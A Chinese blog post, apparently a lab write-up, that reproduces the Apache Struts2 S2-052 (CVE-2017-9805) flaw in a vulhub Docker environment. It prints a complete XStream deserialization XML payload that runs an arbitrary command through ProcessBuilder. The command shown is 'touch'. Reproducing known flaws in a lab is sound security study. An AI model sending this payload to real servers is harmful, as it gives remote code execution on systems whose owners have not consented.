2. 程式人生 > >Struts2-052 漏洞復現

Struts2-052 漏洞復現

阿新 發佈:2018-01-03
hal pty sha sta bject 程序 html message command

s2-052漏洞復現

參考鏈接:

http://www.freebuf.com/vuls/147017.html

http://www.freebuf.com/vuls/146718.html

漏洞描述:

該漏洞由lgtm.com的安全研究員匯報,編號為 CVE-2017-9805 ,漏洞危害程度為高危(Critical)。

當用戶使用帶有 XStream 程序的 Struts REST 插件來處理 XML payloads 時,可能會遭到遠程代碼執行攻擊。

Struts 2.5 – Struts 2.5.12 版本,據稱還影響到 2.3.33 版本。

環境搭建:

Ubuntu(搭建靶機環境)

apt install git docker.io docker-compose

git clone https://github.com/vulhub/vulhub.git

cd vulhub/struts2/s2-052/

docker-compose build

docker-compose up -d

創建完成

技術分享圖片

漏洞復現過程:

向頁面發送POC腳本

# 註意數據包頭要有這個

Content-Type: application/xml

# POST提交的數據

<map>
<entry>
     <jdk.nashorn.internal.objects.NativeString>
       <flags>0</flags>
       <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
         <dataHandler>
           <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
             <is class="javax.crypto.CipherInputStream">
               <cipher class="javax.crypto.NullCipher">
                 <initialized>false
 
</initialized>
                 <opmode>0</opmode>
                 <serviceIterator class="javax.imageio.spi.FilterIterator">
                   <iter class="javax.imageio.spi.FilterIterator">
                     <iter class="java.util.Collections$EmptyIterator"/>
                     <next class="java.lang.ProcessBuilder">
                       <command> # 輸入命令段

 
<string>touch</string>
<string>/tmp/test.txt</string>
                       </command>
                       <redirectErrorStream>false</redirectErrorStream>
                     </next>
                   </iter>
                   <filter class="javax.imageio.ImageIO$ContainsFilter">
                     <method>
                       <class>java.lang.ProcessBuilder</class>
                       <name>start</name>
                       <parameter-types/>
                     </method>
                     <name>foo</name>
                   </filter>
                   <next class="string">foo</next>
                 </serviceIterator>
                 <lock/>
               </cipher>
               <input class="java.lang.ProcessBuilder$NullInputStream"/>
               <ibuffer/>
               <done>false</done>
               <ostart>0</ostart>
               <ofinish>0</ofinish>
               <closed>false</closed>
             </is>
             <consumed>false</consumed>
           </dataSource>
           <transferFlavors/>
         </dataHandler>
         <dataLen>0</dataLen>
       </value>
     </jdk.nashorn.internal.objects.NativeString>
     <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
   </entry>
   <entry>
     <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
     <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
   </entry>
 </map>

通過執行touch命令,我們可以在目標主機生成任意文件。

這裏我通過驗證腳本進行了測試

技術分享圖片

Struts2-052 漏洞復現

相關推薦

Struts2-052 漏洞復現

hal pty sha sta bject 程序 html message command s2-052漏洞復現 參考鏈接: http://www.freebuf.com/vuls/147017.html http://www.freebuf.com/vuls/1467

Apache struts2遠端命令執行_CVE-2017-9805(S2-052)漏洞復現

Apache struts2遠端命令執行_CVE-2017-9805(S2-052)漏洞復現 一、漏洞概述 Apache Struts2的REST外掛存在遠端程式碼執行的高危漏洞,Struts2 REST外掛的XStream外掛的XStream元件存在反序列化漏洞,使用XStream元件對XML格式的資料

struts2-052漏洞學習筆記

瞭解漏洞 struts2是什麼? Struts2是一個基於MVC設計模式的Web應用框架,它本質上相當於一個servlet,在MVC設計模式中,Struts2作為控制器(Controller)來建立模型與檢視的資料互動。Struts 2是Struts的下一代產品,是在 str

struts2-052漏洞學習

一、      1.strust2Struts2是一個基於MVC設計模式的Web應用框架,它本質上相當於一個servlet,在MVC設計模式中,Struts2作為控制器(Controller)來建立模型與檢視的資料互動2.strust2-052漏洞Struts2 REST外掛

漏洞復現Struts2 遠程代碼執行漏洞(S2-033)

res 3par alt param amp lan post pull struts docker pull medicean/vulapps:s_struts2_s2-033 docker run -d -p 80:8080 medicean/vulapps:s_str

Apache struts2 Freemarker標籤遠端命令執行_CVE-2017-12611(S2-053)漏洞復現

Apache struts2 Freemarker標籤遠端命令執行_CVE-2017-12611(S2-053)漏洞復現 一、漏洞描述 Struts2在使用Freemarker模組引擎的時候,同時允許解析OGNL表示式。導致使用者輸入的資料本身不會被OGNL解析,但是由於被Freemarker解析一次後變

Apache struts2 namespace遠端命令執行_CVE-2018-11776(S2-057)漏洞復現

Apache struts2 namespace遠端命令執行_CVE-2018-11776(S2-057)漏洞復現  一、漏洞描述 S2-057漏洞產生於網站配置xml的時候,有一個namespace的值,該值並沒有做詳細的安全過濾導致可以寫入到xml上,尤其url標籤值也沒有做萬用字元的過濾,

LNK文件(快捷方式)遠程代碼執行漏洞復現過程(CVE-2017-8464)

abi cred starting compute appear pda info 等級 server 漏洞編號:CVE-2017-8464 漏洞等級:嚴重 漏洞概要:如果用戶打開攻擊者精心構造的惡意LNK文件,則會造成遠程代碼執行。成功利用此漏洞的攻擊者可以獲得與本地

漏洞預警】CVE-2017-8464 震網三代漏洞復現(兩種利用方法)

art cal mage http test ip地址 get for oot 早在6月13日,微軟發布補丁修復編號為CVE-2017-8464的漏洞,本地用戶或遠程攻擊者可以利用該漏洞生成特制的快捷方式,並通過可移動設備或者遠程共享的方式導致遠程代碼執行,追溯到以前,NS

Office CVE-2017-8570遠程代碼執行漏洞復現

pytho pack root 一個 strong -o 激活 meta 相同 實驗環境 操作機:Kali Linux IP:172.16.11.2 目標機:windows7 x64 IP:172.16.12.2 實驗目的 掌握漏洞的利用方法 實驗

Discuz!X 3.4 任意文件刪除漏洞復現過程(附python腳本)

文件刪除 def aaa dal -1 headers bug send auth   今天看下群裏在討論Discuz!X 3.4 任意文件刪除漏洞,自己做了一些測試,記錄一下過程。結尾附上自己編寫的python腳本,自動化實現任意文件刪除。 具體漏洞,請查看 https:

Tomcat CVE-2017-12615 遠程上傳漏洞復現

pan 技術分享 port style 運行 下載鏈接 imp put tom 漏洞名稱:CVE-2017-12615-遠程代碼執行漏洞 CVE-2017-12615:遠程代碼執行漏洞 當 Tomcat運行在Windows操作系統時,且啟用了HTTP PUT請求方法(例

ADV170014 NTLM SSO 漏洞復現

ntc 機制 run machine 虛擬 關閉 server ref his 2017年10月,微軟周二補丁日發布的補丁中有一個可選的安全補丁:ADV170014,這個補丁修復了NTLM認證機制的一個bug,惡意攻擊者可以利用這個bug竊取用戶密碼hash並可以遠程利用該

[漏洞復現] CVE-2017-11882 通殺所有office版本

CVE-2017-11882 office漏洞 黑客 Kali Linux 滲透測試 1、漏洞概述這幾個月來,針對微軟Office套件最火熱最流行的攻擊手段,莫過於基於CVE-2017-11882的漏洞利用。2017年11月14號,微軟推送了常規的安全更新,其中,關於CVE-2017-11

[漏洞復現] MS17-010 基於"永恒之藍"實現Windows Getshell

永恒之藍 黑客 滲透測試 MS17-010 Kali Linux 1、漏洞概述2017年5月,被稱為近10年來影響範圍最廣泛“最囂張”的WannaCry勒索病毒席卷全球,據統計,全球共有150多個國家超30萬臺終端被感染,波及政府、學校、醫院、金融、航班等各行各業。一旦中了WannaCry

Office CVE-2017-8570 遠程代碼執行漏洞復現

CVE-2017-8570 Office 遠程代碼執行 最近在學習kali的相關使用,朋友說不如就復現cve-2017-8570吧,我欣然答應。 0x00介紹CVE-2017-8570是一個邏輯漏洞,成因是Microsoft PowerPoint執行時會初始化“script”Moniker對象,

[漏洞復現] CVE-2018-4878 Flash 0day

黑客 滲透測試 Kali Linux 漏洞復現 Adobe Flash 1、漏洞概述2018年2月1號,Adobe官方發布安全通報(APSA18-01),聲明Adobe Flash 28.0.0.137及其之前的版本,存在高危漏洞(CVE-2018-4878)。攻擊者通過構造特殊的Flas

[漏洞復現] CVE-2017-16995 Ubuntu16.04漏洞復現

黑客 漏洞復現 Kali Linux 滲透測試 Ubuntu 1、漏洞概述Ubuntu最新版本16.04存在本地提權漏洞,該漏洞存在於Linux內核帶有的eBPF bpf(2)系統調用中,當用戶提供惡意BPF程序使eBPF驗證器模塊產生計算錯誤,導致任意內存讀寫問題。 攻擊者(普通用戶)可

structs2的048漏洞復現 2.3.32版本

重啟 clas arch ext pps index 找到 spa pan S2-048 遠程代碼執行漏洞 影響版本: 2.0.0 - 2.3.32 之前在網上說只要時2.3.*的版本都有這個漏洞,自己裝了個2.3.34的試了幾次都沒有執行 然後下載了找到了

關於weblogic 10.3.6.0 的漏洞復現(1)

iter oid sch AD 成功 str context blog env 最近小R 搭建了個weblogic, 因為之前在公司找系統漏洞的時候,發現了這個漏洞,所以為了特地專門搭建了個10.3.6.0版本。 漏洞編號: CVE-2017-10271 漏洞的描述:就是